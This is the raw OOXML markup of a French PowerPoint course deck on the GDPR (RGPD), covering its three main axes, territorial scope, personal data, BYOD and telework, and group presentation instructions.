    <dgm:cxn modelId="{B158BE0F-C605-498E-AFDF-760769FC8FF3}" srcId="{1A48FE5A-B9CD-429C-8784-49DC90F88E78}" destId="{5A96AAEF-09F6-4B5C-966E-1CE81F135A30}" srcOrd="1" destOrd="0" parTransId="{874E4BB3-2685-4467-A418-169124D32292}" sibTransId="{A843B338-FEB0-4004-8D34-FC80DCCC2B5E}"/>
    <dgm:cxn modelId="{7D2B9331-DCBF-4E69-82D0-F76AFBC1D1C6}" srcId="{1A48FE5A-B9CD-429C-8784-49DC90F88E78}" destId="{87983F37-C049-4C41-AE0C-63B7BE01E284}" srcOrd="0" destOrd="0" parTransId="{656D72F8-722E-4C06-B5BC-592063051C71}" sibTransId="{362C62A1-1194-4CFD-9EF5-4DFBC82A9487}"/>
    <dgm:cxn modelId="{B860CC42-4167-4342-905A-D2DFF1D9BAA0}" srcId="{31245D88-436C-44C9-AD97-02243E95475D}" destId="{1A48FE5A-B9CD-429C-8784-49DC90F88E78}" srcOrd="1" destOrd="0" parTransId="{FAA5E8FF-1C06-4A40-A1EA-19550E346D8A}" sibTransId="{B8056A98-4A78-4325-830A-C6C40EBEA448}"/>
    <dgm:cxn modelId="{47E7D850-D88B-4FCD-B163-8D65C85A318B}" type="presOf" srcId="{5A96AAEF-09F6-4B5C-966E-1CE81F135A30}" destId="{78347299-E708-491B-8657-BD8E81843046}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E5A0BA77-B5B9-4846-9DAF-CFCB967D9C1B}" type="presOf" srcId="{57289B70-76C5-480C-9B6A-E36867FD937C}" destId="{78347299-E708-491B-8657-BD8E81843046}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{55FE5D96-D544-4F84-96A6-13E25E86FEE2}" type="presOf" srcId="{90C2E96C-179B-4D25-8BBA-4344D19330D1}" destId="{36302A27-19A1-4123-AEED-C46611F78B12}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{74BD6E9F-37C2-4D9B-9D77-0A462AB9B033}" srcId="{1A48FE5A-B9CD-429C-8784-49DC90F88E78}" destId="{57289B70-76C5-480C-9B6A-E36867FD937C}" srcOrd="2" destOrd="0" parTransId="{EC3E65AD-0DF3-48E6-9441-B560E8D289AC}" sibTransId="{BEAA329C-7356-4A85-AF74-4D5CD6912203}"/>
    <dgm:cxn modelId="{B8F589C7-E95C-420D-B32B-00B06140107C}" type="presOf" srcId="{31245D88-436C-44C9-AD97-02243E95475D}" destId="{5A07E26D-A821-4E14-B1F6-3D9D9140E1A3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{9A6F1EE6-F596-43AD-BA8B-BF2D0DF95F50}" type="presOf" srcId="{87983F37-C049-4C41-AE0C-63B7BE01E284}" destId="{78347299-E708-491B-8657-BD8E81843046}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{92EB0BF0-F0D0-4DED-98A3-6EFF5042FBC1}" srcId="{31245D88-436C-44C9-AD97-02243E95475D}" destId="{90C2E96C-179B-4D25-8BBA-4344D19330D1}" srcOrd="0" destOrd="0" parTransId="{E5C278B2-0386-42C7-B8B4-92E6576FB707}" sibTransId="{9BAF64DC-1C5E-4D6B-A045-2508BFF24546}"/>
    <dgm:cxn modelId="{30C9839E-3EBD-4B9E-B1A1-3973624DC636}" type="presParOf" srcId="{5A07E26D-A821-4E14-B1F6-3D9D9140E1A3}" destId="{36302A27-19A1-4123-AEED-C46611F78B12}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{0F9FFC52-D2CB-46EF-BB7B-F06A2F3CBF0D}" type="presParOf" srcId="{5A07E26D-A821-4E14-B1F6-3D9D9140E1A3}" destId="{4634D215-6AD4-43E3-8B51-F6433B108538}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{9D90FE2B-9B64-425C-B414-6974A87DE82D}" type="presParOf" srcId="{5A07E26D-A821-4E14-B1F6-3D9D9140E1A3}" destId="{ECC983E3-4951-465C-BAE4-F5B4BB7AC23B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A87AE18B-E224-4F19-B287-F92FD39FBA7B}" type="presParOf" srcId="{5A07E26D-A821-4E14-B1F6-3D9D9140E1A3}" destId="{78347299-E708-491B-8657-BD8E81843046}"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02A27-19A1-4123-AEED-C46611F78B12}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="239735"/>
          <a:ext cx="10691265" cy="121680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r-FR" sz="2800" kern="1200" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Garantir la protection de la vie privée et des libertés</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2800" kern="1200" dirty="0">
            <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="59399" y="299134"/>
        <a:ext cx="10572467" cy="1098002"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{ECC983E3-4951-465C-BAE4-F5B4BB7AC23B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1643735"/>
          <a:ext cx="10691265" cy="121680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r-FR" sz="2800" kern="1200" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>3 Axes majeurs du RGPD</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2800" kern="1200" dirty="0">
            <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="59399" y="1703134"/>
        <a:ext cx="10572467" cy="1098002"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{78347299-E708-491B-8657-BD8E81843046}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2860535"/>
          <a:ext cx="10691265" cy="1446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448" tIns="35560" rIns="199136" bIns="35560" numCol="1" spcCol="1270" anchor="t" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="285750" lvl="1" indent="-285750" algn="l" defTabSz="1244600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="20000"/>
            </a:spcAft>
            <a:buClr>
              <a:srgbClr val="0070C0"/>
            </a:buClr>
            <a:buSzPct val="70000"/>
            <a:buFont typeface="+mj-lt"/>
            <a:buAutoNum type="arabicPeriod"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="2800" kern="1200" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> Renforcer les pouvoirs de sanction des autorités</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="2800" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="285750" lvl="1" indent="-285750" algn="l" defTabSz="1244600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="20000"/>
            </a:spcAft>
            <a:buClr>
              <a:srgbClr val="0070C0"/>
            </a:buClr>
            <a:buSzPct val="70000"/>
            <a:buFont typeface="+mj-lt"/>
            <a:buAutoNum type="arabicPeriod"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="2800" kern="1200" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> Responsabiliser les acteurs de traitements des données</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="2800" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="285750" lvl="1" indent="-285750" algn="l" defTabSz="1244600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="20000"/>
            </a:spcAft>
            <a:buClr>
              <a:srgbClr val="0070C0"/>
            </a:buClr>
            <a:buSzPct val="70000"/>
            <a:buFont typeface="+mj-lt"/>
            <a:buAutoNum type="arabicPeriod"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="2800" kern="1200" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> Renforcer les droits des personnes</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="2800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2860535"/>
        <a:ext cx="10691265" cy="14464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4B7F7-166A-4835-8BE4-5A0A3CEBDCBE}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>08/07/2024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8B3120-E766-4D6A-8CD1-8FAF9E736F7D}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3501818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08A96-1B9A-C1D2-B3FB-F87F8A3C6A6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4E7FBC0-2774-380B-4CD1-D0FBB3D7EF2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1031F52-F519-3ED7-19C9-E9F4D6176E2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3CF6762-4AEB-F8BB-02D8-A260CE49A44A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B18B3120-E766-4D6A-8CD1-8FAF9E736F7D}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1284342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Montrer le livre « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>datavision</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> »</a:t>
            </a:r>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11</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="835934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2BD3B-E458-EC65-A432-C1EE61EC568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9648346-7E0B-C082-92BE-E9AB7E06D53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90A1495-963E-871F-F662-147876D058B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F3E8CBD-D3DE-A32B-37BF-A7169D757BED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B18B3120-E766-4D6A-8CD1-8FAF9E736F7D}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="835681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BB580-4432-C8DE-A61F-3B32B1680F9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62D7427-D5F1-1CDE-5607-A8799AE94BE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E1FFC90-6C54-312B-2BD4-585A36DBBBF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62F291CD-BBAE-F7F6-FAEF-76003F3BA66E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B18B3120-E766-4D6A-8CD1-8FAF9E736F7D}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1182295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lvl="1" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>L’acronyme « BYOD » est l’abréviation de l’expression anglaise « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1"/>
              <a:t>Bring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1"/>
              <a:t>Your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1"/>
              <a:t>Own</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1"/>
              <a:t>Device</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> » </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(en français : « Apportez Votre Equipement personnel de Communication » ou AVEC), </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>qui désigne l'usage d'équipements informatiques personnels dans un contexte professionnel.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>=&gt; Télétravail</a:t>
            </a:r>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18</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2308371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a:solidFill>
                  <a:srgbClr val="00292D"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Restitution orale de 15 minutes par groupe.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lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Rendu attendu : Document texte (lecture à la maison)</a:t>
            </a:r>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19</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1972131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a:solidFill>
                  <a:srgbClr val="00292D"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Restitution orale de 15 minutes par groupe.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lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Rendu attendu : Document texte (lecture à la maison)</a:t>
            </a:r>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20</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3166340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FFB1EAC-BEE3-450C-8EEA-9B42598B1859}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1864057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22</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2974481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628650" lvl="1" indent="-171450">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23</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187083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24</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2495762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a:t>Faire l’installation de Linux pendant l’historique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{73075C5D-0494-4C4F-8019-17306A4C173E}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3015092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AAI : autorité administrative indépendante</a:t>
            </a:r>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25</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="253804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26</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3868092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Qu’est-ce qu’une donnée à caractère personnel ? </a:t>
            </a:r>
          </a:p>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27</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2412572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Qu’est-ce qu’une données à caractère personnel ? </a:t>
            </a:r>
          </a:p>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28</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2340566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29</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42547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30</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2943592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31</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5043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32</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="970819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33</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1718795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000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>RGPD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> a une large portée territoriale et s'applique sur la base de deux critères principaux : l’« </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>établissement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> » d'un responsable du traitement ou d'un sous-traitant dans l'UE, ou des activités de « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ciblage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> » menées par un responsable du traitement ou un sous-traitant non établi dans l'UE à l'égard de personnes concernées dans l'UE.</a:t>
            </a:r>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34</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3405388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FFB1EAC-BEE3-450C-8EEA-9B42598B1859}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41506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35</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
